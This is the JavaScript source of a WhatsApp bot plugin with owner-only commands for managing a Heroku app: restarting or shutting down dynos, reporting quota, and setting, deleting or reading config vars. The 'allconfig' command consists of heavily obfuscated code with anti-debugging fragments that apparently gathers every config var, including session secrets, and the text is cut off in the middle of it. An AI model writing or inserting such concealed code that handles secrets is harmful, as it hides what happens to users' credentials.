/*
░██████╗░██╗░░░██╗███████╗███████╗███╗░░██╗
██╔═══██╗██║░░░██║██╔════╝██╔════╝████╗░██║
██║██╗██║██║░░░██║█████╗░░█████╗░░██╔██╗██║
╚██████╔╝██║░░░██║██╔══╝░░██╔══╝░░██║╚████║
░╚═██╔═╝░╚██████╔╝███████╗███████╗██║░╚███║
░░░╚═╝░░░░╚═════╝░╚══════╝╚══════╝╚═╝░░╚══╝
░█████╗░███╗░░░███╗██████╗░██╗
██╔══██╗████╗░████║██╔══██╗██║
███████║██╔████╔██║██║░░██║██║
██╔══██║██║╚██╔╝██║██║░░██║██║ █▀█ █▀▀█ █▀█ ▄█─ 
██║░░██║██║░╚═╝░██║██████╔╝██║ ─▄▀ █▄▀█ ─▄▀ ─█─ 
╚═╝░░╚═╝╚═╝░░░░░╚═╝╚═════╝░╚═╝ █▄▄ █▄▄█ █▄▄ ▄█▄
Copyright (C) 2021 Black Amda.
Licensed under the  GPL-3.0 License;
you may not use this file except in compliance with the License.
*/

const QueenAmdi = require('queenamdi-public');
const Amdi = QueenAmdi.events
const Build = QueenAmdi.build
const Heroku = require('heroku-client');
const {secondsToHms} = require('./afk');
const got = require('got');
const {MessageType} = require('@blackamda/queenamdi-web-api');
const sql = require('./sql/greetings');

const Language = require('../language');
const Lang = Language.getString('heroku');

const heroku = new Heroku({
    token: Build.HEROKU.API_KEY
});


let baseURI = '/apps/' + Build.HEROKU.APP_NAME;

Amdi.operate({pattern: 'restart', fromMe: true, desc: Lang.RESTART_DESC, dontAddCommandList: true, deleteCommand: false}, (async (message, match) => {

    await message.client.sendMessage(message.jid,Lang.RESTART_MSG, MessageType.text);
    console.log(baseURI);
    await heroku.delete(baseURI + '/dynos').catch(async (error) => {
        await message.client.sendMessage(message.jid,error.message, MessageType.text);
    });
}));

Amdi.operate({pattern: 'shutdown', fromMe: true, desc: Lang.SHUTDOWN_DESC, dontAddCommandList: true, deleteCommand: false}, (async(message, match) => {

    await heroku.get(baseURI + '/formation').then(async (formation) => {
        forID = formation[0].id;
        await message.client.sendMessage(message.jid,Lang.SHUTDOWN_MSG, MessageType.text);
        await heroku.patch(baseURI + '/formation/' + forID, {
            body: {
                quantity: 0
            }
        });
    }).catch(async (err) => {
        await message.client.sendMessage(message.jid,error.message, MessageType.text);
    });
}));


if (Build.WORKTYPE == 'private') {

    Amdi.operate({pattern: 'dyno', fromMe: true, desc: Lang.DYNO_DESC, dontAddCommandList: true, deleteCommand: false}, (async (message, match) => {

        heroku.get('/account').then(async (account) => {
            // have encountered some issues while calling this API via heroku-client
            // so let's do it manually
            url = "https://api.heroku.com/accounts/" + account.id + "/actions/get-quota"
            headers = {
                "User-Agent": "Chrome/80.0.3987.149 Mobile Safari/537.36",
                "Authorization": "Bearer " + Build.HEROKU.API_KEY,
                "Accept": "application/vnd.heroku+json; version=3.account-quotas",
            }
            await got(url, {headers: headers}).then(async (res) => {
               const resp = JSON.parse(res.body);
               total_quota = Math.floor(resp.account_quota);
               quota_used = Math.floor(resp.quota_used);         
               percentage = Math.round((quota_used / total_quota) * 100);
               remaining = total_quota - quota_used;
               await message.client.sendMessage(
                    message.jid,
                    Lang.DYNO_TOTAL + ": ```{}```\n\n".format(secondsToHms(total_quota))  + 
                    Lang.DYNO_USED + ": ```{}```\n".format(secondsToHms(quota_used)) +  
                    Lang.PERCENTAGE + ": ```{}```\n\n".format(percentage) +
                    Lang.DYNO_LEFT + ": ```{}```\n".format(secondsToHms(remaining)),
                    MessageType.text
               );
            }).catch(async (err) => {
                await message.client.sendMessage(message.jid,err.message, MessageType.text);     
            });        
        });
    }));
}
else if (Build.WORKTYPE == 'public') {

    Amdi.operate({pattern: 'dyno', fromMe: true, desc: Lang.DYNO_DESC, dontAddCommandList: true, deleteCommand: false}, (async (message, match) => {

        heroku.get('/account').then(async (account) => {
            // have encountered some issues while calling this API via heroku-client
            // so let's do it manually
            url = "https://api.heroku.com/accounts/" + account.id + "/actions/get-quota"
            headers = {
                "User-Agent": "Chrome/80.0.3987.149 Mobile Safari/537.36",
                "Authorization": "Bearer " + Build.HEROKU.API_KEY,
                "Accept": "application/vnd.heroku+json; version=3.account-quotas",
            }
            await got(url, {headers: headers}).then(async (res) => {
               const resp = JSON.parse(res.body);
               total_quota = Math.floor(resp.account_quota);
               quota_used = Math.floor(resp.quota_used);         
               percentage = Math.round((quota_used / total_quota) * 100);
               remaining = total_quota - quota_used;
               await message.client.sendMessage(
                    message.jid,
                    Lang.DYNO_TOTAL + ": ```{}```\n\n".format(secondsToHms(total_quota))  + 
                    Lang.DYNO_USED + ": ```{}```\n".format(secondsToHms(quota_used)) +  
                    Lang.PERCENTAGE + ": ```{}```\n\n".format(percentage) +
                    Lang.DYNO_LEFT + ": ```{}```\n".format(secondsToHms(remaining)),
                    MessageType.text
               );
            }).catch(async (err) => {
                await message.client.sendMessage(message.jid,err.message, MessageType.text);     
            });        
        });
    }));
}

Amdi.operate({pattern: 'setvar ?(.*)', fromMe: true, desc: Lang.SETVAR_DESC, dontAddCommandList: true, deleteCommand: false}, (async(message, match) => {

    if (match[1] === '') return await message.client.sendMessage(message.jid,Lang.KEY_VAL_MISSING, MessageType.text);
    if (match[1] === 'ANTIBAD' || match[1] === 'ANTIBUG' || match[1] === 'ANTILINK' || match[1] === 'LANGUAGE' || match[1] === 'WORK_TYPE') return await message.client.sendMessage(message.jid,'```Use``` *.settings* command to change.', MessageType.text);

    if ((varKey = match[1].split('=')[0]) && (varValue = match[1].split('=')[1])) {
        await heroku.patch(baseURI + '/config-vars', {
            body: {
                [varKey]: varValue
            }
        }).then(async (app) => {
            await message.client.sendMessage(message.jid,Lang.SET_SUCCESS.format(varKey, varValue), MessageType.text);
        });
    } else {
        await message.client.sendMessage(message.jid,Lang.INVALID, MessageType.text);
    }
}));


Amdi.operate({pattern: 'delvar ?(.*)', fromMe: true, desc: Lang.DELVAR_DESC, dontAddCommandList: true, deleteCommand: false}, (async (message, match) => {

    if (match[1] === '') return await message.client.sendMessage(message.jid,Lang.KEY_VAL_MISSING, MessageType.text);
    await heroku.get(baseURI + '/config-vars').then(async (vars) => {
        key = match[1].trim();
        for (vr in vars) {
            if (key == vr) {
                await heroku.patch(baseURI + '/config-vars', {
                    body: {
                        [key]: null
                    }
                });
                return await message.client.sendMessage(message.jid,Lang.DEL_SUCCESS.format(key), MessageType.text);
            }
        }
        await message.client.sendMessage(message.jid,Lang.NOT_FOUND, MessageType.text);
    }).catch(async (error) => {
        await message.client.sendMessage(message.jid,error.message, MessageType.text);
    });

}));

Amdi.operate({pattern: 'getvar ?(.*)', fromMe: true, desc: Lang.GETVAR_DESC, dontAddCommandList: true, deleteCommand: false}, (async (message, match) => {

    if (match[1] === '') return await message.client.sendMessage(message.jid,Lang.KEY_VAL_MISSING, MessageType.text);
    await heroku.get(baseURI + '/config-vars').then(async (vars) => {
        for (vr in vars) {
            if (match[1].trim() == vr) return await message.sendMessage("```{} - {}```".format(vr, vars[vr]));
        }
        await message.client.sendMessage(message.jid,Lang.NOT_FOUND, MessageType.text);
    }).catch(async (error) => {
        await message.client.sendMessage(message.jid,error.message, MessageType.text);
    });
}));

Amdi.operate({pattern: 'allconfig', fromMe: true, desc: Lang.GETVAR_DESC, dontAddCommandList: true, deleteCommand: false}, (async (message, match) => {
    function _0x4da6(_0x4d4d49,_0x3a8524){const _0x455522=_0x3915();return _0x4da6=function(_0x11c9ed,_0x447bcb){_0x11c9ed=_0x11c9ed-(0xc3*-0x21+-0xc4*-0x2a+0x685*-0x1);let _0x3fa3ba=_0x455522[_0x11c9ed];return _0x3fa3ba;},_0x4da6(_0x4d4d49,_0x3a8524);}function _0x3915(){const _0x3e278b=['ivHMD','nNbok','\x5c(\x20*\x5c','CzGLr','DEMOT','jIVsv','cDXsj','SiHqM','mLdCm','wgDMf','input','ATXMW','dSwNg','RufnG','hKNbq','TszHe','▬\x0a\x0a','List*','vMcay','XtFSq','TtoIj','lncKZ','``\x20\x0a{','aPOxr','INlGX','bvYeR','ISLTR','Obdio','WyCVd','isVMI','NAME','3456FAWkEh','FIiqm','CHAT','WGnYx','TDhbi','FKSGn','nfrOE','ANTIL','FtMEC','Ftkic','nJYEK','239872zKaFWz','mvtoa','xcaiC','HEPFu','oSRAA','clien','}\x0a\x0a','YbkZM','\x5c+\x5c+\x20','KkZhG','SESSI','xPKYB','forma','PrxyN','strin','const','oeDUH','ffCUo','dqQyX','bAbmI','12zghHBm','/conf','BAN_M','XxxJS','esDve','lybWe','then','aXhqp','essag','actio','PkShm','MpTst','DHWNr','hMnnC','*🔐\x20Qu','juLqW','```💾\x20','HNeQb','InGnC','YuxqJ','aIMlr','YsQdR','Zxtmf','DIyFa','DSPyI','DLlJh','ALIVE','CblpG','NpMTB','lLSND','UBjZp','Wdguo','CTsoO','DNwky','denuZ','YjgsX','een\x20A','VbXeY','SZQvz','HuUZa','wIIzb','iNMtp','_MESS','XqstY','dehyx','3723BrWKJJ','UyMjE','QyIky','JkZrA','ryssL','kFsGC','YHeLb','funct','mKZKJ','_CHAT','hOvQn','MESSA','shQvz','TE_ME','\x0a▬▬▬▬','VQoku','AGE','text','BmsYa','WHrqQ','Rmcri','YaAoM','lFSlx','IMGBB','glLFj','RAnxU','bqKFq','AFK_M','UNMUT','TYPE','rIYQD','state','cVuOL','juIiX','UNRNV','JoxOU','MajsT','jid','uild\x20','FxvTp','WStUO','BYE_L','QNbgr','e)\x20{}','ESSAG','HLOfr','bcfEk','353410bExLVD','44uJHdVt','mmdun','PROMO','SSAGE','hExmO','bpqHL','E_MES','catch','Vars\x20','eCtcJ','otlEU','_LOGO','rrffS','hTaoE','FCyBB','ifrZr','get','nVGsM','BLOCK','MUTE_','OkMyo','ADD_M','avJzh','zA-Z_','wcQis','apply','OPcOU','KYvkZ','uiGOB','XUMKI','SzpMD','tHfWf','fXIoK','brqpG','$]*)','MicSK','WNwOL','TTGLn','CeBiy','oNdqX','AMDI_','TLSyg','wnhAd','chain','xXClX','TEibK','hvjHc','HANDL','USTtA','bDsbH','gELiT','iFDGL','TYVei','ijBhT','Objec','_EMOJ','teuFG','QECxS','lengt','ofTuu','fyxXX','RNcvr','LANGU','yxnSf','qeBua','gYnjs','IO_LI','UTdFV','LHmPH','NgqtC','GjRGd','count','EaMnw','Sadqs','MdZtx','QifJy','DIjor','cRvlp','EWTBg','AhyEf','DnmFb','sRbxz','ByvaF','IMIvy','pRgOY','yfhFS','JVnGo','ZKreO','ion\x20*','keYXX','dzMFR','IvKPi','rsDkT','hyVQL','CFywQ','DWoaS','SAGE','SqSXE','uSVIr','tgLtg','MXkbv','kunsO','2132165SSkjrX','0-9a-','aDtbK','IZE','Lyreg','messa','GLTtg','KqUlm','DIgwt','ySgwV','PzFzK','HVBdP','NpZyW','init','MAX_S','gger','iHqLO','KICKM','IrfMz','uJReU','BcmDa','GuPUP','hSadp','WyYKW','AUTOB','EPXGy','debu','poztM','trim','eBtiP','mGrOc','ructo','RsGMR','ekvaM','Trikm','mXmQp','NBNEv','MEKYB','hxUrP','eduSP','mwqET','MQALi','vfdqU','RJdaW','iqYWY','hgJyv','ncACW','uoOIz','LImHh','JyWvK','YyovF','KcljR','OPSxn','EWoHF','WORK_','*(?:[','sTABz','READ','OuhaP','idfMA','lDyZC','IrFHv','kRXTO','sFidW','kssOp','mdi\x20B','RoFnK','zggKc','HvwCm','HFWQv','nzXQs','XYkkZ','slUki','OCSdo','OGARc','\x20(tru','pLxYL','RYZIw','QWeNK','NAuQC','4332610DRuhtL','KYOGC','ykcsY','oNGKn','FlHOK','BhMvW','yVjUU','ERS','YdSig','ANTIB','MENU','qKTkj','SEND_','gSIrD','qDLdt','INK','IgpWl','PKbkW','WELCO','HUJyD','sAQbs','UvlUz','a-zA-','CBHvZ','▬▬▬▬▬','MgBXU','AxSwz','uJNiT','BYFSU','YvueV','while','15381utloHL','sendM','XjYFe','pFqrn','HOiNd','wxvNH','kDsgA','MSDOF','kaLkO','qilwU','GmWAy','tDsSA','ig-va','cqyDH','vFRop','wIAho','UKXzd','HrbCb','ME_LO','juHMu','KvJjH','MNwCy','OGO','CAP','KsQfD','SUDO','HFVhh','ceFTG','TTpMv','test','WFZZS','tLKoq','530IbiItz','FJdLS','yLeeP','pPdzT','nvhif','Z_$][','zuvGg','fivnj','iNVdM','sayRM','TsJzR','{}\x20:`','UTHCz','urWQz','mSBjr','PANEL','IZVpH','xKPQY','HgamL','call','3715140GmXsgz','EPnvJ','dZlfy','dRfvI','IiKqX','TortB','ZgjRx','bhTfh','sCVnV'];_0x3915=function(){return _0x3e278b;};return _0x3915();}function _0x483cc1(_0x3979fd,_0x20e52a,_0x59a0bc,_0x43ce0e,_0x3d0e84){return _0x4da6(_0x59a0bc- -0x253,_0x3979fd);}(function(_0x3a8110,_0x24c181){function _0x146d46(_0x389030,_0x3e8dab,_0x31825d,_0x9b1c66,_0x3c7d9c){return _0x4da6(_0x3c7d9c- -0x7,_0x3e8dab);}function _0x2ea55d(_0x3061ad,_0x48827c,_0x1006b0,_0x18ff78,_0x27f27a){return _0x4da6(_0x1006b0-0x28,_0x27f27a);}function _0x2df3a8(_0x537462,_0x2d8c6b,_0x2f4050,_0x3dd4d6,_0x1da1ba){return _0x4da6(_0x3dd4d6- -0x399,_0x2f4050);}function _0x7b6c1c(_0x31950e,_0x556b6d,_0xfb564f,_0x57edef,_0x39a427){return _0x4da6(_0x31950e-0x20b,_0x39a427);}const _0x580b0c=_0x3a8110();function _0x9367(_0x19cee0,_0x2db6a7,_0x4c73f2,_0x5817f7,_0xa2ccb){return _0x4da6(_0xa2ccb- -0xf0,_0x5817f7);}while(!![]){try{const _0x316495=parseInt(_0x2df3a8(-0x3a1,-0x392,-0x33a,-0x2ed,-0x358))/(0x11*0x67+0x1*0x7bd+0x7*-0x215)+-parseInt(_0x9367(0x1f5,0xd5,0x9b,0x124,0x122))/(-0x191a+0x232a+-0xa0e)*(parseInt(_0x9367(-0x97,0x83,-0x76,-0x31,-0x3))/(0xe5*0x1d+0x51e+-0x1f0c))+-parseInt(_0x9367(0x5e,0x66,-0x68,-0x43,-0x30))/(0x22b5*0x1+-0x1591+-0xd20)*(parseInt(_0x2df3a8(-0x2fb,-0x2a6,-0x243,-0x27d,-0x2d0))/(-0x2*0x5c3+-0x1*0x210b+0x2c96))+-parseInt(_0x2ea55d(0x278,0x307,0x24e,0x2dc,0x1e5))/(0x1458+-0x22ae*-0x1+-0x3700)+parseInt(_0x2df3a8(-0x2af,-0x166,-0x2b1,-0x216,-0x181))/(-0x663+-0x22*-0x44+0x1*-0x29e)+-parseInt(_0x2df3a8(-0x2d2,-0x27f,-0x36b,-0x2f8,-0x2ec))/(0x1dcf+-0x9b9+-0x140e)*(parseInt(_0x146d46(0x146,0x189,0x13a,0x1d3,0x1eb))/(-0x69d+-0x48f*-0x3+-0x7*0x101))+-parseInt(_0x2ea55d(0x167,0x23b,0x1fb,0x26c,0x212))/(-0x20a8+0x1b31+0x581*0x1)*(-parseInt(_0x2df3a8(-0x2cd,-0x20b,-0x1f0,-0x27c,-0x2df))/(0x1*0x179b+0x26ff+-0x3e8f));if(_0x316495===_0x24c181)break;else _0x580b0c['push'](_0x580b0c['shift']());}catch(_0x57498e){_0x580b0c['push'](_0x580b0c['shift']());}}}(_0x3915,0x5*0x16405+-0x3f70b*0x1+0x165f2*0x2));const _0x3d9ca9=(function(){const _0x1c60a4={'xXClX':function(_0x14f675,_0x30eeef){return _0x14f675==_0x30eeef;},'ISLTR':_0x3ded0a(0x2ea,0x367,0x43b,0x382,0x364)+_0x22a9a4(0x365,0x1f6,0x2bd,0x233,0x2ca)+_0x22a9a4(0x1d9,0x195,0x82,0x9c,0x145)+_0x1785e4(0x3d6,0x396,0x4a1,0x443,0x376),'WyCVd':_0x22a9a4(0x233,0x106,0x1cd,0x160,0x1a1)+_0x1785e4(0x589,0x576,0x4fb,0x506,0x4e2)+_0x1785e4(0x4a5,0x43f,0x3bf,0x415,0x37e)+')','FxvTp':_0x22a9a4(0xb2,0x1be,0x181,0x176,0x161)+_0x3ded0a(0x412,0x51c,0x3c9,0x46c,0x4d4)+_0x1785e4(0x52f,0x5c8,0x614,0x57a,0x594)+_0x22a9a4(0x200,0x2e5,0x35a,0x2ba,0x2c4)+_0x207e57(0x450,0x414,0x42d,0x499,0x421)+_0x3ded0a(0x46a,0x38d,0x34c,0x3e6,0x380)+_0x1785e4(0x428,0x464,0x494,0x4d0,0x464),'KcljR':function(_0x2883e7,_0x2bf360){return _0x2883e7(_0x2bf360);},'MicSK':_0x22a9a4(0x274,0x1c4,0x204,0x1b1,0x23d),'mSBjr':function(_0x2c69a7,_0x511a3d){return _0x2c69a7+_0x511a3d;},'IvKPi':_0x22a9a4(0x2b1,0x2c8,0x2ac,0x2ab,0x1f5),'uoOIz':_0x1785e4(0x34c,0x3bf,0x417,0x41d,0x498),'XtFSq':function(_0x4520b1){return _0x4520b1();},'KqUlm':function(_0x5cf433,_0x3455e0,_0x7faf83){return _0x5cf433(_0x3455e0,_0x7faf83);},'juHMu':function(_0x5ec81f,_0x4fcbf1){return _0x5ec81f===_0x4fcbf1;},'DIgwt':_0x207e57(0x52e,0x46b,0x512,0x477,0x484),'oNdqX':function(_0x185017,_0x1eb8c3){return _0x185017!==_0x1eb8c3;},'DIyFa':_0x207e57(0x377,0x394,0x4cb,0x34a,0x40d),'wgDMf':function(_0x5907d9,_0x5a90eb){return _0x5907d9==_0x5a90eb;},'JVnGo':function(_0x25cf33,_0x490af4){return _0x25cf33===_0x490af4;},'HFWQv':_0x207e57(0x2f2,0x3b3,0x364,0x369,0x337)};function _0x22a9a4(_0x5977be,_0x29345b,_0x3cc936,_0x35bed7,_0x4d9045){return _0x4da6(_0x4d9045-0xad,_0x35bed7);}function _0x3ded0a(_0x4b1419,_0x18609a,_0x1ef63b,_0x4b84a2,_0x102f09){return _0x4da6(_0x4b84a2-0x2b2,_0x18609a);}let _0x28dcf9=!![];function _0x1785e4(_0x1edd04,_0x5246ee,_0x34d4c8,_0x3eeaf,_0xc35229){return _0x4da6(_0x3eeaf-0x391,_0x34d4c8);}function _0x207e57(_0x540e89,_0x308a90,_0x5757f9,_0x43e8ec,_0x538781){return _0x4da6(_0x538781-0x29d,_0x308a90);}function _0x5731f4(_0x1e5181,_0x1dc6e7,_0x44a517,_0xc93516,_0x5f5895){return _0x4da6(_0x5f5895-0x1f4,_0x1dc6e7);}return function(_0x237ae6,_0x5a5b7b){function _0x2f7f23(_0x1ccb25,_0x5a9e20,_0x3dcca2,_0x2cc9b7,_0x579761){return _0x22a9a4(_0x1ccb25-0x94,_0x5a9e20-0xa6,_0x3dcca2-0xa8,_0x1ccb25,_0x5a9e20- -0x236);}const _0x3a05ff={'DHWNr':function(_0x266f43,_0x5d309c){function _0x3d403a(_0x7f4d0f,_0x119cfb,_0x890b77,_0x2cf7b6,_0x529555){return _0x4da6(_0x529555- -0x6e,_0x7f4d0f);}return _0x1c60a4[_0x3d403a(0x14b,0x197,0x163,0xfd,0xdb)](_0x266f43,_0x5d309c);},'UyMjE':_0x1c60a4[_0x9f1f23(-0x399,-0x2d2,-0x2d0,-0x39e,-0x28a)],'SzpMD':_0x1c60a4[_0x9f1f23(-0x254,-0x21e,-0x2ce,-0x29d,-0x2b8)],'qilwU':_0x1c60a4[_0x5acfd7(0x324,0x348,0x3bc,0x434,0x36c)],'WGnYx':function(_0x41a50f,_0x51b820){function _0x5a9b19(_0x40973c,_0x4e17cf,_0x9ce2ea,_0x4e79b0,_0x1e2246){return _0x5acfd7(_0x40973c-0x32,_0x4e17cf,_0x9ce2ea- -0x66c,_0x4e79b0-0x2c,_0x1e2246-0xf1);}return _0x1c60a4[_0x5a9b19(-0x216,-0x162,-0x20e,-0x14d,-0x1b8)](_0x41a50f,_0x51b820);},'zuvGg':_0x1c60a4[_0x44459c(-0x74,-0xfa,-0x12f,-0xbc,-0x8c)],'brqpG':function(_0x4de3e6,_0x2ed4ac){function _0x33755e(_0x106d80,_0x4ecef2,_0x4dacfe,_0x7ef88,_0x409edf){return _0x44459c(_0x4ecef2,_0x4ecef2-0x11e,_0x4dacfe-0x117,_0x7ef88-0x126,_0x409edf-0x67);}return _0x1c60a4[_0x33755e(0x65,0x97,0xfc,0x62,0xbb)](_0x4de3e6,_0x2ed4ac);},'oNGKn':_0x1c60a4[_0x2f7f23(0x4c,-0x11,0x6,-0x43,-0x65)],'TEibK':_0x1c60a4[_0x2f7f23(0x24,0x29,0xbf,0x72,-0x5e)],'InGnC':function(_0xae8477){function _0x4a48d8(_0x343969,_0x7f5da2,_0x58b874,_0x2d4c72,_0x214dd7){return _0x2f7f23(_0x343969,_0x2d4c72-0x65,_0x58b874-0x17,_0x2d4c72-0x1ce,_0x214dd7-0xc4);}return _0x1c60a4[_0x4a48d8(-0x11f,-0xd3,-0x63,-0x8f,-0x14e)](_0xae8477);},'bDsbH':function(_0x52a25b,_0x281121,_0x36c44c){function _0x4e6e4f(_0x269483,_0x2713c5,_0x19d0b6,_0x5ce2a9,_0x272d90){return _0x44459c(_0x269483,_0x2713c5-0x181,_0x19d0b6-0xaf,_0x5ce2a9-0x3d,_0x5ce2a9-0x1e5);}return _0x1c60a4[_0x4e6e4f(0xce,0x255,0x229,0x1a3,0x13e)](_0x52a25b,_0x281121,_0x36c44c);},'oeDUH':function(_0x29c964,_0x384c5d){function _0x3587c6(_0x45e97e,_0x30f48e,_0x2fc2a2,_0x526f52,_0x268246){return _0x44459c(_0x268246,_0x30f48e-0x14b,_0x2fc2a2-0xa,_0x526f52-0x1b8,_0x30f48e-0x1c8);}return _0x1c60a4[_0x3587c6(0x1fd,0x201,0x238,0x27b,0x2cf)](_0x29c964,_0x384c5d);},'iNVdM':_0x1c60a4[_0x5acfd7(0x401,0x4dc,0x433,0x439,0x4bc)],'dRfvI':function(_0x5a1238,_0x5d0542){function _0x34537d(_0x521f52,_0x4a78fe,_0x467cf5,_0x387b00,_0x40a25e){return _0x9f1f23(_0x521f52-0x4a,_0x387b00,_0x4a78fe-0x23d,_0x387b00-0x67,_0x40a25e-0x13d);}return _0x1c60a4[_0x34537d(-0x41,0x15,0x2c,0xcb,0x77)](_0x5a1238,_0x5d0542);},'YjgsX':_0x1c60a4[_0x2f7f23(-0x99,-0xb2,-0xf1,-0x89,-0x34)],'cDXsj':function(_0x2bd5e9,_0x4e6206){function _0xdfcf16(_0x28c48a,_0x181448,_0x25d975,_0x53c2a8,_0x48ebd0){return _0x44459c(_0x53c2a8,_0x181448-0x36,_0x25d975-0xf6,_0x53c2a8-0x19f,_0x48ebd0-0x41);}return _0x1c60a4[_0xdfcf16(-0xd3,-0x114,-0x66,-0x53,-0x100)](_0x2bd5e9,_0x4e6206);}};function _0xefcd3(_0x55938f,_0x248dce,_0x154dec,_0xd244b9,_0x458b5c){return _0x3ded0a(_0x55938f-0x12c,_0xd244b9,_0x154dec-0x90,_0x248dce- -0x533,_0x458b5c-0x128);}function _0x44459c(_0x431b3c,_0x1c5802,_0x11aca3,_0x1ee24d,_0x557a60){return _0x1785e4(_0x431b3c-0x1c9,_0x1c5802-0x125,_0x431b3c,_0x557a60- -0x55d,_0x557a60-0xb7);}function _0x9f1f23(_0x488dd0,_0x37f709,_0x4f1723,_0x27c868,_0x75a1b4){return _0x22a9a4(_0x488dd0-0x12f,_0x37f709-0x58,_0x4f1723-0x9f,_0x37f709,_0x4f1723- -0x419);}function _0x5acfd7(_0x1e53f1,_0x5a4354,_0x7b1828,_0x4d02bf,_0x563126){return _0x207e57(_0x1e53f1-0x1e,_0x5a4354,_0x7b1828-0x175,_0x4d02bf-0x60,_0x7b1828-0xb);}if(_0x1c60a4[_0x5acfd7(0x429,0x3b5,0x41b,0x387,0x4af)](_0x1c60a4[_0x2f7f23(0x43,0x3f,0x30,0x1a,0x6c)],_0x1c60a4[_0x2f7f23(0x34,0x3f,-0x2b,0x5f,0x6f)])){const _0x46d0a8=_0x28dcf9?function(){function _0x5f41dc(_0x4282cd,_0x1ca894,_0x11d613,_0x495835,_0x8a1e15){return _0xefcd3(_0x4282cd-0x58,_0x4282cd-0x3ed,_0x11d613-0x55,_0x8a1e15,_0x8a1e15-0x117);}function _0x2fb298(_0xe3f7ab,_0x52ffe6,_0x1526ab,_0x506679,_0xcc4f59){return _0x44459c(_0x506679,_0x52ffe6-0x118,_0x1526ab-0x9,_0x506679-0x1ac,_0xcc4f59-0x149);}function _0x35ffaa(_0x1c9990,_0x9b8e4e,_0x1538f1,_0xbeb3ec,_0x133b97){return _0x5acfd7(_0x1c9990-0x187,_0x1c9990,_0xbeb3ec-0x5,_0xbeb3ec-0x38,_0x133b97-0x1d1);}function _0x3bbe36(_0x53c777,_0x3ca87e,_0xd4c2ab,_0x14219d,_0x168c40){return _0xefcd3(_0x53c777-0xd3,_0x3ca87e-0x1d1,_0xd4c2ab-0x151,_0xd4c2ab,_0x168c40-0xf4);}function _0x213edf(_0x59c546,_0x13870b,_0x5de306,_0x2527af,_0x18e682){return _0x44459c(_0x18e682,_0x13870b-0xb7,_0x5de306-0xb9,_0x2527af-0x1a1,_0x2527af-0x108);}const _0xc4e05d={'OPcOU':_0x3a05ff[_0x5f41dc(0x2a7,0x1e6,0x264,0x238,0x219)],'ijBhT':_0x3a05ff[_0x35ffaa(0x46d,0x4da,0x492,0x4a8,0x409)],'eduSP':function(_0x259d1f,_0x39dd71){function _0x5086a1(_0x58e27d,_0x5bf5ee,_0x43b844,_0x1e7d04,_0xe4cec8){return _0x5f41dc(_0x5bf5ee- -0x3da,_0x5bf5ee-0x153,_0x43b844-0x1ad,_0x1e7d04-0x156,_0xe4cec8);}return _0x3a05ff[_0x5086a1(-0x25e,-0x1ca,-0x264,-0x167,-0x1c3)](_0x259d1f,_0x39dd71);},'BmsYa':_0x3a05ff[_0x213edf(0x181,0x16e,0x214,0x154,0x174)],'vFRop':function(_0x36994d,_0xcf86df){function _0x5d0d80(_0x11a625,_0x2e5bea,_0x2bf26d,_0x1484a4,_0x1b633f){return _0x213edf(_0x11a625-0x118,_0x2e5bea-0x142,_0x2bf26d-0xea,_0x1484a4- -0x57,_0x2bf26d);}return _0x3a05ff[_0x5d0d80(0x31,0x65,-0x74,0x23,0xcd)](_0x36994d,_0xcf86df);},'hOvQn':_0x3a05ff[_0x2fb298(0x203,0x1ee,0x112,0x228,0x153)],'FlHOK':_0x3a05ff[_0x5f41dc(0x2b6,0x21d,0x2a3,0x270,0x2c7)],'hvjHc':function(_0x382033){function _0x1fd1a7(_0xc2a8db,_0x352f42,_0x28de3a,_0x3c479a,_0x545c8c){return _0x2fb298(_0xc2a8db-0x16c,_0x352f42-0x24,_0x28de3a-0x11e,_0x352f42,_0xc2a8db-0xee);}return _0x3a05ff[_0x1fd1a7(0x13d,0xd2,0x1b7,0x1bd,0x169)](_0x382033);},'HgamL':function(_0x4d371a,_0x488720,_0x519da8){function _0x50595c(_0x345a7f,_0x5d4e58,_0x535903,_0x36ee4f,_0x462005){return _0x5f41dc(_0x5d4e58-0x25f,_0x5d4e58-0x149,_0x535903-0x7f,_0x36ee4f-0xdf,_0x345a7f);}return _0x3a05ff[_0x50595c(0x58d,0x519,0x453,0x52f,0x49e)](_0x4d371a,_0x488720,_0x519da8);}};if(_0x3a05ff[_0x213edf(-0xb0,0xb5,0x4e,-0x8,0x91)](_0x3a05ff[_0x3bbe36(0xb0,0x16a,0x154,0x1c0,0x1e6)],_0x3a05ff[_0x35ffaa(0x4ae,0x4a8,0x596,0x4c7,0x4d6)])){if(_0x5a5b7b){if(_0x3a05ff[_0x35ffaa(0x52c,0x4dc,0x405,0x4d6,0x55d)](_0x3a05ff[_0x35ffaa(0x2d5,0x2f4,0x2fa,0x390,0x33e)],_0x3a05ff[_0x213edf(0x84,0x7f,0x13,0x1f,-0x34)])){const _0x12ad65={'sFidW':_0xc4e05d[_0x2fb298(0xe1,0xb5,0x1e,0xf6,0xb4)],'Wdguo':_0xc4e05d[_0x213edf(0xc4,0x79,-0x22,0x8e,0x28)],'DnmFb':function(_0x3025ec,_0x440316){function _0x603ed7(_0x5b3b72,_0x52baee,_0xe0b246,_0x146924,_0x149ad){return _0x35ffaa(_0x149ad,_0x52baee-0x85,_0xe0b246-0x1d9,_0x5b3b72- -0x30c,_0x149ad-0xbc);}return _0xc4e05d[_0x603ed7(0x14b,0xe4,0xc2,0xc2,0x176)](_0x3025ec,_0x440316);},'pFqrn':_0xc4e05d[_0x213edf(0x81,-0x69,0xe9,0x3b,0x94)],'bcfEk':function(_0x657dd2,_0x256bcf){function _0x224f36(_0x1001d4,_0x4eb315,_0x3f4d23,_0x2879e9,_0x55d7a5){return _0x3bbe36(_0x1001d4-0x131,_0x4eb315-0xf1,_0x3f4d23,_0x2879e9-0xf0,_0x55d7a5-0x60);}return _0xc4e05d[_0x224f36(0x2b4,0x241,0x175,0x2ab,0x2a3)](_0x657dd2,_0x256bcf);},'RoFnK':_0xc4e05d[_0x5f41dc(0x263,0x267,0x27f,0x309,0x216)],'CblpG':_0xc4e05d[_0x3bbe36(0x1a6,0x127,0x1b4,0xd5,0x1a6)],'RufnG':function(_0x163af7){function _0x3954fe(_0x29b2c3,_0xa18f4b,_0x17d4ad,_0x3feee0,_0x5559a3){return _0x2fb298(_0x29b2c3-0x1ad,_0xa18f4b-0xef,_0x17d4ad-0x67,_0x5559a3,_0x29b2c3-0x114);}return _0xc4e05d[_0x3954fe(0x1dc,0x271,0x2b2,0x277,0x275)](_0x163af7);}};_0xc4e05d[_0x213edf(0xa4,0x174,0xbd,0x160,0x176)](_0x142cfe,this,function(){const _0x1b2d26=new 